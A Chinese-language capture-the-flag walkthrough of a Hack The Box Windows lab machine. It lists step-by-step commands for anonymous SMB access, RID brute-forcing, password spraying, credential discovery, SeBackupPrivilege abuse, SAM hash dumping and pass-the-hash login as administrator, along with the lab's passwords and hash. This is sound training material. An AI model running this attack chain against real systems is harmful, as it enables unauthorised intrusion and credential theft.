端口扫描
nmap 10.10.11.35
扫描结果
smb连接
发现开放445端口有smb服务,连接试试
smbclient -L //10.10.11.35
发现需要密码使用免密登录试试
smbclient -N //10.10.11.35
或者
enum4linux -a -u guest 10.10.11.35
把这个文件下载下来看看
get "Notice from HR.txt"
获取到一个默认的密码Cicada$M6Corpb*@Lp#nZp!8
Rid爆破
**crackmapexec **工具使用:https://www.cnblogs.com/Yang34/p/14411497.html
crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"
或者
nxc smb 10.10.11.35 -u guest -p '' --rid-brute --users
这是两个工具爆破得到的结果
其实都是差不多的可以得到用户名列表
john.smouldersarah.danteliamichael.wrightsondavid.oreliousemily.oscars
遍历用户名密码看哪个正确
crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
发现对michael.wrightson用户可用
enum4linux-ng扫描
使用enum4linux-ng搜集所有与smb服务有关的信息
enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'10.10.11.35 -t 10
发现了david的密码:aRt$Lp#7t*VQ!3
使用该用户进行smb连接
可以看到有一个文件下载下来使用get "文件名"命令
发现了用户名和密码
winrm登录
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
使用evil-winrm 登录得到用户的flag
SeBackupPrivilege
查看当前用户的权限
关于这个 SeBackupPrivilege:Windows Privilege Escalation: SeBackupPrivilege – Hacking Articles
pypykatz
使用 pypykatz 得到 admin 的 hash 值
impacket-secretsdump
或者使用impacket-secretsdump工具
impacket-secretsdump -sam sam -system system LOCAL
最后使用 evil-winrm 的 hash 登录到 admin,得到 root.txt
evil-winrm -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
原文始发于微信公众号(土拨鼠的安全屋):HTB靶场通关-1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论